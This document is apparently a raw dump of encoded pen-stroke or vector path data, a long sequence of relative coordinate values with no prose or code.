0-1,0-1 0,0 0 0,0 1 1,0-1-1,0 0 0,0 0 1,0 0-1,0 0 0,-2-2 0,-39-32-10694,32 23 7307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4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36,'0'0'7180,"9"-6"-5070,-10 6-1908,0 0 0,0 0 0,0 0 0,1 0 1,-1 1-1,0-1 0,0 0 0,0 0 1,1 0-1,-1 1 0,0-1 0,0 0 0,1 1 1,-1-1-1,0 1 0,1-1 0,-1 1 1,1-1-1,-1 1 0,0-1 0,1 1 0,-1 0 1,1-1-1,0 1 0,-1 0 0,1-1 1,-1 1-1,1 0 0,0-1 0,0 1 0,-1 0 1,1 0-1,0 0 0,0-1 0,0 2 1,30 6 441,13 10-280,-35-16-296,-1 0 0,0 0 0,1-1 0,-1 0 0,1 0 0,-1-1 0,1 0 0,0 0 0,13-2 1,23 0 198,-30 4-127,-12-2-129,-1 1 0,1-1 0,0 1 0,-1-1 1,1 0-1,0 0 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1 0 0,0-1 0,-1 1 1,1-1-1,2 0 0,-3 0-11,-1 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,-1 1 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1-1,-1-1 1,1 0 0,-1 0 0,1 1 0,-1-1 0,1 1 0,1-1-7,32-6 39,8 11-47,33-15 333,-75 9-399,6 0 16,-6 1 67,1 0 1,-1 0-1,1 0 1,-1-1 0,1 1-1,-1 0 1,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 1 1,0-1-1,1 0 1,-1 0 0,1 0-1,-1 1 1,1-1-1,-1 0 1,0 0 0,1 1-1,-1-1 1,0 0-1,1 1 1,-1-1 0,0 1-1,1-1 1,-1 0-1,1 2 1,-1-1 27,1-1-8,7 0-28,-7 1-106,-1-1 111,0 1 0,0-1 0,0 0 0,1 0 1,-1 1-1,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,1 0 1,-1 0-1,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,0 0 0,0-1 0,0 1 0,0-1 1,6 7-2,-6-6 2,0 0 1,0 0-1,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 1 0,0-1 0,0-1 8,8 3 14,-4 3-10,4-2-14,-7-6 4,-1 2 80,-10 20 112,10 167-109,10-143-91,-10 182 57,-10-195-23,10 79-60,-11-79-18,11 237 32,-4-260 20,3-6-1,1 0 0,-1-1 0,0 1-1,1 0 1,-1 0 0,1-1 0,-1 1-1,1 0 1,0 0 0,-1 0 0,1 0 0,0-1-1,0 1 1,-1 0 0,1 0 0,0 0 0,0 0-1,0 1 1,0 82 149,4-79-145,-4-4-5,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0-1 0,0 2 0,0-1-9,0 1 33,0-1 0,1 0-1,-1 0 1,0 0 0,0 0-1,0 0 1,0 1-1,-1-1 1,1 0 0,0 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,0 0-1,0 0 1,1 0 0,-1 0-1,-1 1 1,0-1-5,2 0-17,0 3-2,0-3-3,0 0-21,0 3 16,0-3 1,-2-2-474,0 1 124,0-1 1,1 0 0,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0-1 0,1 1-1,-1 0 1,1-1 0,0 1 0,0-1-1,-1 1 1,1-1 0,0 0 0,0 0-1,0 1 1,1-1 0,-1 0 0,0 0 0,1 0-1,-1 0 1,0-3 0,-8-16-3825,-2 3 538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32,'0'0'780,"-13"6"3238,-1 0 756,-1 0-4137,-17 12-334,30-18-9,-9 7 825,11-6-1095,-1 0 0,0 0-1,0 0 1,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 0 0,-1 1 0,1-1-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0 0,0 0-1,-1 0 1,0-1 0,-1 4-22,1 0 0,-1 0 1,1 0-1,0 0 0,0 1 1,0-1-1,0 1 0,1-1 1,-1 1-1,0 5 0,-11 16 31,11-22-37,-1 0-1,1 0 1,0 1 0,1-1 0,-1 0 0,0 1-1,1-1 1,0 1 0,0 0 0,0-1 0,0 1-1,1 0 1,-1 0 0,1-1 0,0 7-1,1-9 6,-1 0 0,1 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,1 0 0,-1-1 0,0 1 0,0 0-1,1-1 1,-1 1 0,1-1 0,-1 1 0,1-1-1,-1 1 1,1-1 0,-1 0 0,1 0 0,-1 0-1,1 0 1,1 0 0,58 2 129,-51-2-191,42 0 13,-50 0 54,-1-1-3,1 1 0,-1-1 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1-1 0,9-35 24,-10 35-24,-1-1 1,0 0-1,0 0 0,-1 1 1,1-1-1,-1 0 0,0 1 0,0-1 1,0 0-1,0 1 0,-3-5 1,0-12 27,-3-2 178,6 20-149,-1 0 0,0-1-1,0 1 1,0 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-5-1 0,5 3-62,-1-1-1,1 2 0,0-1 1,0 0-1,0 0 0,-1 1 1,1-1-1,0 1 0,0-1 0,0 1 1,0 0-1,0 0 0,0 0 1,0 0-1,-2 2 0,-57 21-2933,25-16-4151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0 508,'0'0'2842,"-41"6"3028,15 0-4176,23-4-1625,0 1 1,1-1-1,-1 1 1,0 0-1,1-1 1,-1 1 0,1 0-1,0 0 1,-2 5-1,-8 9 68,11-14-70,0-1-1,0 1 0,1 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 0 0,1 0 0,-1-1 1,0 1-1,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,0-1-1,1 1 0,2 4 1,4 4 34,-7-10-99,-1 0 1,1-1-1,-1 1 1,1 0 0,-1 0-1,1 0 1,0 0-1,-1-1 1,1 1-1,0 0 1,-1-1-1,1 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,-1-1 1,2 1 0,6 1 12,0-1 0,0 1 0,0-2 1,0 1-1,0-1 0,0 0 0,0 0 1,0-1-1,0 0 0,0-1 1,-1 1-1,1-2 0,0 1 0,-1-1 1,1 0-1,-1-1 0,0 1 1,0-2-1,-1 1 0,1-1 0,-1 0 1,10-9-1,-14 10 4,0 1 1,-1-1-1,1 0 0,-1 0 1,0-1-1,0 1 0,0 0 1,0-5-1,-1 7 48,0 0 1,0 0 0,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,0 0 0,0 0-1,1 0 1,-1 1-1,0-1 1,0 0-1,-1 1 1,1-1 0,0 0-1,0 1 1,-1 0-1,1-1 1,-1 1-1,0 0 1,-2-2 0,0 1-29,0 0 1,-1 1-1,1-1 1,0 1-1,-1 0 1,1 1-1,0-1 1,-1 1-1,1-1 1,-9 2-1,4 0-109,-1 0 0,1 1 0,0 0 0,-1 0 0,1 1 0,0 0 1,0 0-1,1 1 0,-1 1 0,-15 10 0,4 3-1188,-22 16-8788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2 108,'0'0'1870,"11"-1"616,-11 2-1955,0 42 3906,0 35-2151,4-70-2166,3 7 232,-7-14-222,2 29 687,-1-29-841,0-1 49,0 0 0,-1 0 0,1 1 1,-1-1-1,0 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 1 0,0-1 1,1 1-1,-1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 1,0-1-1,1 1 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 1,-1-1-1,1 1 0,0 0 0,0 0 0,0 0 112,-2 22 1119,-2-21-1181,5 0 72,2 0-153,-1-1 40,-2 0 398,0-2 83,12-5-263,17-6 90,-15 6-170,20 2-42,-28 3-112,1 0 0,-1 0 1,0 0-1,1 1 0,-1 0 0,0 0 0,1 1 1,-1-1-1,0 1 0,12 4 0,-16-4-14,-1 0 0,1 0-1,0-1 1,-1 1-1,1 0 1,0-1 0,-1 1-1,1-1 1,0 1 0,0-1-1,0 0 1,2 0 0,0 1 16,-1-1 0,1 1 0,-1 0 0,1 1 0,-1-1 0,0 0 0,0 1 0,0 0 0,4 2 0,-4-2 14,-1-1 12,21 4 100,-1 1-96,-15-5-50,36-1 268,-41 0-198,39 0 32,13-6 119,-9-7-96,7-10-104,-50 23-24,21-5-45,-16 5 48,-3 4 0,-4-4 0,1 0 1,-1 1 0,0-1-1,1 0 1,-1 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0 0,-1-1-1,0 1 1,1 0 0,-1 0 0,1-1-1,-1 1 1,1 0 0,-1-1-1,0 1 1,1-1 0,4-2 42,13-2 55,-15 4-114,1 0 0,-1-1-1,0 1 1,1 0-1,-1 1 1,1-1-1,-1 0 1,1 1-1,-1 0 1,1 0-1,5 1 1,31 5 22,-39-7-12,-1 0 7,1 1-1,-1-1 0,0 1 1,0-1-1,1 1 0,-1 0 1,0-1-1,1 1 0,-1 0 1,0-1-1,1 1 0,-1 0 0,1-1 1,-1 1-1,0 0 0,1-1 1,-1 1-1,1 0 0,-1 0 1,1 0-1,-1 0 0,1-1 1,-1 1-1,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 0 1,1 1-1,1 0-1,0-1 1,0 1 0,0-1-1,1 0 1,-1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,1-1 0,-1 1-1,0 0 1,3-2-1,11 0 28,1 5-53,-15-3 86,15 0 110,-15 0-332,6 0 95,-7 0 69,-1 0 1,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0-1,0 0 1,1 0 0,-1-1 0,1 1 0,-1 0 0,0-1-1,1 1 1,-1 0 0,0-1 0,0 1 0,1-1 0,-1 1-1,0 0 1,1-1 0,-1 0 10,-8 5-144,8-3 46,-1-1 1,0 1-1,0 0 1,1-1-1,-1 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 0-1,0 1 0,0-1 1,0 0-1,1 1 1,-1-1-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,-2 1 1,-63-24-13410,46 18 10277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5:0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1 120,'0'0'3684,"22"11"-254,-22-10-3083,1-2-164,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,0 1 0,1-1-1,-1 0 1,1 1 0,-1-1 0,0 1 0,1 0 0,-1-1 0,1 1-1,-1 0 1,1 0 0,-1 0 0,3 0 0,31-2 2393,-30 2-2386,0-1 0,-1 2 0,1-1 0,0 1 0,0-1 0,-1 1-1,1 0 1,0 1 0,-1-1 0,1 1 0,-1 0 0,1 0 0,4 4 0,0-1-14,-4-3-134,0-1 0,0 1 0,0-1 0,0 0 0,1 0 0,-1-1 0,0 0 0,9 0 0,37 4 378,-48-3-389,0 0-1,0-1 1,1 0-1,-1 0 0,0 0 1,0 0-1,1 0 1,-1 0-1,0-1 1,6-1-1,13-2 117,-18 4-106,1-1-1,0 1 1,-1-1-1,1 0 1,-1-1-1,1 1 1,3-3-1,-6 3-28,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 1,1 1-1,-1 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 1 0,3 1 0,-1 0 6,1 0 1,-1 0-1,0 0 0,0-1 0,1 0 1,-1 0-1,10 1 0,72-8 47,-47 12 2,-37-6-61,21 0 105,73-18-31,-66 18-9,-28 0-68,41 0 99,-43 0-100,0-1-1,1 1 1,-1-1 0,0 1 0,0-1 0,1 1 0,-1 0 0,0-1 0,1 1-1,-1 0 1,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,1 0 0,-1 0-1,0-1 1,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 1-1,0-1 1,1 1 0,-1-1 0,0 0 0,0 1 0,0-1 0,1 1-1,-1-1 1,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0 0 0,-4 4 18,3-5-21,1 0 0,-1 1-1,1-1 1,0 0-1,-1 0 1,1 1 0,-1-1-1,1 0 1,0 1 0,-1-1-1,1 0 1,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,-1 1-1,1-1 1,0 0 0,0 1-1,0-1 1,0 1 0,0-1-1,0 1 1,-1-1-1,1 1 1,0-1 0,0 1-1,0-1 1,0 1 0,1-1-1,-1 1 1,0 22 13,0-21-11,1-1-1,-1 1 1,0 0-1,1-1 1,-1 1-1,0-1 1,0 1 0,-1-1-1,1 1 1,0 0-1,0-1 1,-1 1-1,1-1 1,-1 1 0,1-1-1,-1 1 1,0-1-1,1 0 1,-1 1-1,0-1 1,0 0 0,-2 3-1,3-4 0,-2 23-5,0-3-147,0-19 126,2-1 25,1 0 0,-1 0 1,0 0-1,0-1 0,0 1 0,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0 0 0,0-1 1,-1 1-1,1 0 0,0 0 0,0 0 0,0 0 1,0-1-1,-1 1 0,1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,-1 0 0,1-1 0,0 1 1,0 0-1,-1 0 0,1 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 0 0,0 0 0,-1 1 1,1-1-1,0 0 0,0 0 0,-1 0 0,1-1-163,-23-22-9917,14 16 6628,-2 1 17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0 482 200,'0'13'15653,"0"-7"-14139,0-1-1195,0-11 891,54-30 443,-26 21-1618,-18 11-44,-1-1 0,0 0 0,0 0 0,-1-1 0,1 0 0,8-9 0,-11 11 45,0 0 1,0 1 0,1 0-1,-1 0 1,1 0 0,0 1-1,-1 0 1,1 0 0,9 0 0,14-6 147,154-48 137,-118 38-459,63-10 90,-116 24 88,0 0-30,0 1 0,1 0 0,-1 1 0,1 0 0,25 1 0,-21-1 1,1-1 0,0-1 0,-1 0 0,0-1 1,0-1-1,33-16 0,35-10 15,-56 22 33,-23 7-61,1 0 1,0 1-1,0-1 0,0 2 1,0-1-1,11 0 1,67-17 21,133-41 10,-180 50-34,-26 6 0,0 1 1,0 1 0,24-3-1,51-7 19,-22 6-24,-44 6 8,1 1-8,-1-1 0,0-1 0,1-2 0,25-5 0,-29 5 14,1 0 0,-1 1 0,1 1 0,0 0 0,-1 2 0,38 6 0,40 0-57,-59-7 23,0 2 0,44 7 0,-1 4 38,-41-7 50,46 12-1,-72-16-10,0-1 0,0 0 0,0 0 0,0-2 0,-1 1 1,18-5-1,29 1 223,-22 3-180,-21-1-56,-1 2 0,1 0 0,0 1-1,27 6 1,-30-5 58,0-1 0,0 0 0,0 0-1,0-2 1,0 0 0,16-3 0,27 0 407,-31 3-383,-13 0-92,0 1 0,-1 1 0,1 0 1,19 4-1,21-1 53,-7-2-91,134 16 53,7 13 770,-17-1 253,-129-27-1057,-37-3-7,0 0 0,0 0 0,0 0-1,-1 1 1,1-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,5 3-1,34 4 22,-40-6-18,1-1 0,-1 1 0,1-1 0,-1 0-1,1 0 1,-1 0 0,1 0 0,0-1 0,4 1 0,13 4 23,-17-4-18,8 0-8,-1 1 0,1 0 0,-1 0 0,1 2 1,-1-1-1,0 1 0,12 7 0,12 2 109,53 13 464,-66-22-509,0 1 0,0 1 0,-1 1 1,29 13-1,-49-16-69,-1-3 8,31 17-25,-9 13 6,-21-29 1,1 0-1,0 1 0,1-1 1,-1 0-1,0 0 0,1 0 1,-1-1-1,1 1 0,-1-1 1,1 1-1,4 1 0,-5-3 27,19 19 164,-19-16-175,0 0-1,0 0 0,1 0 1,-1 0-1,1 0 0,-1-1 0,1 1 1,0-1-1,0 0 0,0 0 1,0 0-1,0 0 0,5 1 0,-1 4 1,-5-5-1,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1-1,1 1 1,3 0 0,9 9 25,-15-9-25,1 0 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,-1 1 1,1-1-1,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,1 0 0,0 0-7,32 6 28,-30-7-15,1 8-12,-5-6 16,0 3-5,0-3-6,-45 17-4564,34-15 2560,0-1 0,-1 0 1,1-1-1,0 0 0,-1-1 1,-16-2-1,-4 1-2001,0 1 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3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22 28,'0'0'115,"0"-1"0,0 1 0,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,7-5 5994,0 7-3757,-6-11 650,-3 18-1695,-9 14-1218,9-21-82,-1 0-1,1-1 1,0 1 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,1 0 0,-1 3 0,-9 22 33,8-25-40,1 1 1,-1 0 0,1-1 0,0 1-1,0 0 1,0 0 0,0 0 0,0 0-1,0 4 1,0-1-1,0 0 0,0-1 0,-1 1 0,0 0 0,-1-1-1,-4 10 1,1-3 2,-44 72-55,46-79 50,1 1 0,0-1 1,0 1-1,1 0 0,-1 0 0,1 0 0,-2 10 0,4-15-8,0 0-1,0 0 0,0 0 0,-1 1 1,1-1-1,0 0 0,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,0 0 1,1 0-1,-1 0 0,0 0 0,-1 1 1,1-1 12,0 0 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 1 1,0 0-1,1-1 0,-1 1 1,0-1-1,1 1 0,0 0 1,-1 0-1,1-1 0,0 4 1,-10 19 177,9-22-176,-1 0 0,1 1 0,-1 0-1,1-1 1,0 1 0,0 0 0,0 0 0,1 0 0,-2 4 0,0-3-3,0 0 0,-1 0 0,1 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,-6 3 0,8-6 0,1 0 0,-1 0 0,1 0-1,0 0 1,0 0 0,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,1 0-1,-1 1 1,1-1 0,-1 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,0 1 1,0-1 0,0 0-1,0 0 1,0 0 0,0 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,-1 0 0,1 0-1,-1 0 1,0 2 0,1-3 19,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,18 1-56,-10-1 170,13-1 25,-16 0-147,1 1 0,-1-1 0,1 1 0,0 1 0,-1-1 0,1 1 0,-1 0 0,1 0 0,6 3 0,-6-2-9,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,12-1 0,-16 0-1,26 1 163,1 2 0,-1 1 0,48 13 0,-30-2-149,29 6 7,-53-15 251,0 2 1,0 0 0,0 0 0,26 17-1,-37-16-35,-23-7-393,-27-8-6175,36 5 3984,-29-5-5397,12 1 3778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2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26 180,'0'-6'6146,"11"-1"-4853,-11-6 3623,-9 15-2017,7-2-1974,2 0-930,1 0 50,-1 0 0,0-1-1,1 1 1,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 1-1,1-1 1,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 1 0,0-1-1,0 0 1,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0-1,1 0 1,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1-1,1 1 1,-1 106 63,-11-82-96,0 25-38,0 21 38,11-63 0,1-5 11,-1-1 0,0 1-1,0-1 1,0 0 0,0 1-1,-1-1 1,1 1 0,0-1-1,-1 0 1,0 1 0,0-1-1,1 0 1,-1 0 0,0 0-1,-3 4 1,-7 36 302,9-27-64,2-15-250,0 0-1,0 1 1,0-1 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,-1 1 0,1-1-1,0 0 1,0 0 0,0 1 0,0-1 0,-1 0-1,1 0 1,0 0 0,0 1 0,-1-1 0,1 0-1,0 0 1,0 0 0,-1 0 0,1 0-1,0 0 1,0 1 0,-1-1 0,1 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1 0-1,-2 0 113,0 10-2161,-6-14-2621,-4-20-3775,12 17 5002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32 540,'22'-31'8129,"-22"34"-6068,0 14 1442,0-12-3343,0 0 1,-1 0 0,1 0 0,-1 0 0,0 0 0,-1 0 0,-2 8 0,2-9-138,1-1 1,0 0-1,0 1 0,1-1 0,-1 1 1,1-1-1,-1 1 0,1 3 1,-4 24 51,3-27-47,0-1-1,0 1 1,0-1 0,1 1 0,-1-1-1,1 1 1,0 0 0,0 6 0,1-7 1,-1-1 1,0 1-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 0,0 0 1,0 0-1,-2 4 1,1 12 261,2-18-276,0-1 0,0 0 1,0 0-1,0 1 0,1-1 0,-1 0 0,0 1 1,0-1-1,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,0-1 0,0 1 0,0-1 1,0 0-1,0 1 0,-1-1 0,1 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 1 1,-1-1-1,1 0 0,0 1 0,0-1 1,-1 0-1,1 0 0,0 1 0,0-1 0,-1 0 1,1 0-1,0 0 0,0 0 0,-1 1 0,1-1 1,0 0-1,-1 0 0,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,-1 0 0,1 0 1,0 0-1,-1 0 0,0 0 0,0 0 185,10-21 416,-8 20-606,1-1-1,-1 0 1,0 0-1,0-1 0,0 1 1,0 0-1,0 0 0,0-1 1,0 1-1,-1 0 1,1-3-1,1-2-4,-1 1 0,1-1 0,0 1 0,1-1 0,0 1 0,0 0 0,0 0 0,1 1 0,6-10 0,13-22 6,-18 29-7,0 1 0,1 0 0,0 1 0,0-1 0,1 1 0,0 0 0,0 1 0,0 0 0,1 0 0,10-5 0,-16 9-7,11-1-23,5 3 9,-16 0 19,1 0 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,2 5 0,-2-3-6,-1 0-1,0 1 1,0-1-1,-1 0 1,1 1 0,-1-1-1,0 1 1,0 5 0,-1-3-39,0 0 0,0 1 0,0-1 0,-1 0 0,0 0 1,-6 12-1,-3 14-2412,6 3-5116,5-30 4548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26 1024,'-1'-8'6175,"3"-7"-3378,-1 14-2724,-1 1 1,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0-1,0 1 1,0-1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 0-1,-1 0 1,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,7 17 782,-5-15-807,0 0-1,0 0 0,-1 0 0,1 1 0,-1-1 1,0 0-1,0 1 0,0-1 0,0 1 0,0 5 1,6 22 72,-6-26-84,1 0 1,-2 0-1,1 1 1,0-1-1,-1 1 1,0-1-1,0 0 1,-1 1-1,0-1 1,0 1-1,0-1 1,-3 8 0,-2 24 481,4-29-359,-1 1 1,0-1 0,0 0-1,0 0 1,-1 0 0,-1 0-1,1 0 1,-1-1 0,-1 0-1,-10 12 1,7-12 5,-1 0-1,0 0 1,0 0-1,-1-2 1,0 1-1,0-1 1,0-1-1,-18 5 1,3 0-106,19-7-73,1 0 0,-1 0 1,0-1-1,1 0 1,-1-1-1,0 0 0,0 0 1,0 0-1,1 0 1,-1-1-1,0-1 1,-7-1-1,1 0-119,11 3-143,-1-1 0,1 0 1,-1 1-1,1-1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,1-1 0,-4-3 1,3 4-287,1-1 0,-1 0 1,1 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,1 0 1,-1 0-1,1-1 0,0 1 1,-1 0-1,1 0 0,0-1 1,0 1-1,1 0 0,-1 0 1,0-1-1,1 1 0,0-2 1,8-9-2584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1756,'0'0'1908,"18"-6"7911,-18 5-9813,0 1-1,-1 0 0,1 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 0,-1 0 1,1 0-1,0 0 1,0 0-1,0 0 0,-1 0 1,1 0-1,0 0 0,0 1 1,0-1-1,0 0 1,-1 0-1,1 0 0,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,0 0 1,0 0-1,-1 1 0,1-1 1,0 0-1,0 0 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 0,0 0 1,0 1-1,0-1 0,0 0 1,0 1-1,6 15-473,-2-7-2750,-2 9-6400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90 1288,'-2'2'8351,"20"4"-6218,-13-5-1978,0 0 1,0 0-1,0 0 1,0-1-1,0 0 1,0 0-1,8-1 1,0-4 381,-1-1 0,0 0-1,16-11 1,-8 4 67,-19 13-582,-1-1 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0-1,0 